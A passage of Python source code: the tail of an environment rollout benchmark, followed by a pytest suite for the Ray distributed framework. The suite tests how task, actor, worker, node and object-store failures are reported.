os.remove(addr)
elif socket_kind == "tcp":
addr = ("127.0.0.1", 0)
else:
raise Exception("invalid socket_kind")
s = Server(addr=addr, socket_kind=socket_kind, make_venv=make_server_venv)
addr = s.listen()
t = threading.Thread(target=s.run, daemon=True)
t.start()
def make_venv():
return Client(
addr=addr,
socket_kind=socket_kind,
num_envs=n,
env_options={},
reuse_arrays=True,
use_shared_memory=use_shared_memory,
)
venv = make_venv()
act = [venv.action_space.sample() for _ in range(n)]
def rollout(max_steps):
venv.reset()
step_count = 0
while step_count < max_steps:
venv.step_async(act)
venv.step_wait()
step_count += 1
benchmark(lambda: rollout(1000))
venv.close()
|
test_failure.py | import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
